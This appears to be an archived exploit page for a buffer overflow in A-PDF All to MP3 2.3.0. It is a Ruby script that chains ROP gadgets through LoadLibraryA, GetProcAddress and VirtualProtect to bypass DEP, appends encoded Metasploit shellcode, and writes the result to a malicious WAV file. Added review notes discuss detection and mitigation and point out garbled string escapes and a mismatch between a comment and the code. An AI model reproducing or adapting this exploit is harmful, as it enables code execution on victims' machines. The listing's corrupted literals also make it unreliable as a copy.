
A-PDF All To MP3 2.3.0 Buffer Overflow

Posted on 11 August 2011

#!/usr/bin/ruby
#
#[+]Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit
#[+]Date: 0982011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.a-pdf.com/all-to-mp3/
#[+]Version: 2.3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#Dep bypass method:
#LoadLibraryA("kernel32.dll") + GetProcAddress(%EAX,"VirtualProtect") + VirtualProtect(%ESP,0x400,0x40,0x10007064) == Universal DEP BYPASS. :)
#
# --- Review notes (defensive reading of the archived PoC, code kept byte-for-byte) ---
# What the script produces (see the end of the file): a byte string of
# 4128 x "A", the chain assembled below, 10 filler bytes, the encoded
# payload and 2000 x "C", written to Exploit.wav. The output carries no
# RIFF/WAVE header and is dominated by long runs of a single byte, which
# is a simple signature for input validation or content inspection in
# front of this converter.
# The chain consists of hard-coded absolute addresses (0x004xxxxx and
# 0x1xxxxxxx ranges), so it presumably depends on the targeted modules
# loading at fixed bases - mandatory ASLR or removing/updating the
# affected version would be the mitigation (inferred, confirm).
# The string literals in this archived copy appear garbled by the page
# rendering (sequences such as "x00", "x41"); they are reproduced as
# archived, so do not treat the listing as a faithful copy of the original.
# The author's comment above names dwSize 0x400, while the chain below
# pushes 0x00000500 - comment and code disagree; noted, not changed.
# The date field "0982011" also looks mangled (likely a day/month/year
# run together) - unverified.
#
#Address for LoadLibraryA 0x6D00CEE8
########################################ROP FOR LOAD LoadLIbraryA("kernell32.dll")###########################
rop = [0x1001FD1C].pack('V') # POP ESI # RETN
rop += [0x6D00CEE8].pack('V') # Address to LoadLibraryA
rop += [0x004936B4].pack('V') # POP EBP # RETN
rop += [0x1003ba4d].pack('V') # ADD ESP,2C # RETN // return address used when LoadLibraryA returns
rop += [0x004cc008].pack('V') # PUSHAD # POP EBX # RETN
rop += "kernel32.dllx00" # library name argument, as archived (terminator escape appears garbled)
rop += "A" * 15 # padding to the next gadget
#########################################ROP END HERE##########################################################
#Address to GetProcAddress 0x6D00CEC8
#########################################ROP FOR GetProcAddress################################################
rop += [0x0040BF8F].pack('V') # POP EDI # RETN
rop += [0x6D00CEC8].pack('V') # Address to GetProcAddress
rop += [0x1001FD1C].pack('V') # POP ESI # RETN
rop += [0x1003ba4d].pack('V') # ADD ESP,2C # RETN // return address used when GetProcAddress returns
rop += [0x005c59cb].pack('V') # MOV EBP,EAX # RETN
rop += [0x004cc014].pack('V') # PUSHAD # RETN
rop += "VirtualProtectx00" # procedure name argument, as archived (terminator escape appears garbled)
rop += "A" * 13 # padding to the next gadget
#########################################ROP END HERE##########################################################
#########################################ROP FOR VirtualProtect################################################
rop += [0x00544a41].pack('V') # XCHG EAX,ESI # RETN
rop += [0x004AEC05].pack('V') # POP EBP # RETN
rop += [0x00436E98].pack('V') # JMP ESP // return address used when VirtualProtect returns
rop +=
[0x1002FDC2].pack('V') # POP EBX # RETN
rop += [0x00000500].pack('V') # dwSize value (differs from the 0x400 named in the header comment)
rop += [0x00402f24].pack('V') # POP EDX # RETN
rop += [0x00000040].pack('V') # flNewProtect value
rop += [0x005c373c].pack('V') # POP ECX # RETN
rop += [0x0040108E].pack('V') # lpflOldProtect value
rop += [0x004cc008].pack('V') # PUSHAD # POP EBX # RETN
#########################################ROP END HERE##########################################################
# windows/exec - 460 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=process, CMD=calc
# Payload string reproduced as archived; the escape sequences appear garbled
# in the same way as the literals above.
shellcode = "xdbxc1xd9x74x24xf4x5bx53x59x49x49x49x43x43" +
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58" +
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" +
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" +
"x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4dx38" +
"x4cx49x43x30x45x50x45x50x43x50x4dx59x5ax45" +
"x50x31x49x42x52x44x4cx4bx50x52x56x50x4cx4b" +
"x51x42x54x4cx4cx4bx56x32x52x34x4cx4bx52x52" +
"x51x38x54x4fx4ex57x50x4ax51x36x50x31x4bx4f" +
"x50x31x4fx30x4ex4cx47x4cx45x31x43x4cx43x32" +
"x56x4cx51x30x4fx31x58x4fx54x4dx45x51x49x57" +
"x5ax42x5ax50x51x42x51x47x4cx4bx51x42x52x30" +
"x4cx4bx47x32x47x4cx45x51x4ex30x4cx4bx47x30" +
"x43x48x4dx55x4fx30x52x54x50x4ax45x51x58x50" +
"x50x50x4cx4bx47x38x45x48x4cx4bx56x38x51x30" +
"x45x51x4ex33x4dx33x47x4cx47x39x4cx4bx50x34" +
"x4cx4bx45x51x49x46x50x31x4bx4fx56x51x4fx30" +
"x4ex4cx49x51x58x4fx54x4dx45x51x4fx37x50x38" +
"x4dx30x52x55x4cx34x54x43x43x4dx5ax58x47x4b" +
"x43x4dx47x54x43x45x4bx52x50x58x4cx4bx56x38" +
"x51x34x45x51x4ex33x52x46x4cx4bx54x4cx50x4b" +
"x4cx4bx51x48x45x4cx43x31x58x53x4cx4bx45x54" +
"x4cx4bx43x31x4ex30x4cx49x47x34x56x44x47x54" +
"x51x4bx51x4bx43x51x56x39x50x5ax50x51x4bx4f" +
"x4bx50x50x58x51x4fx51x4ax4cx4bx54x52x5ax4b" +
"x4bx36x51x4dx52x4ax45x51x4cx4dx4cx45x4ex59" +
"x43x30x45x50x43x30x50x50x52x48x50x31x4cx4b" +
"x52x4fx4cx47x4bx4fx4ex35x4fx4bx5ax50x4fx45" +
"x4fx52x56x36x45x38x49x36x5ax35x4fx4dx4dx4d" +
"x4bx4fx49x45x47x4cx43x36x43x4cx54x4ax4bx30" +
"x4bx4bx4dx30x52x55x54x45x4fx4bx47x37x54x53" +
"x43x42x52x4fx52x4ax43x30x50x53x4bx4fx58x55" +
"x43x53x43x51x52x4cx45x33x45x50x41x41"
# Assemble the file body: 4128-byte "A" run, then the chain, 10 filler
# bytes (the author's "x90" literal as archived), the payload and a
# 2000-byte "C" tail. Total size is fixed and easy to match for detection.
buf = "A" * 4128
buf += rop
buf += "x90" * 10
buf += shellcode
buf += "C" * 2000
# Writes Exploit.wav in binary mode. The explicit f.close is redundant:
# File.open with a block closes the handle when the block ends.
File.open("Exploit.wav","wb") do |f|
f.write buf
f.close
end

 
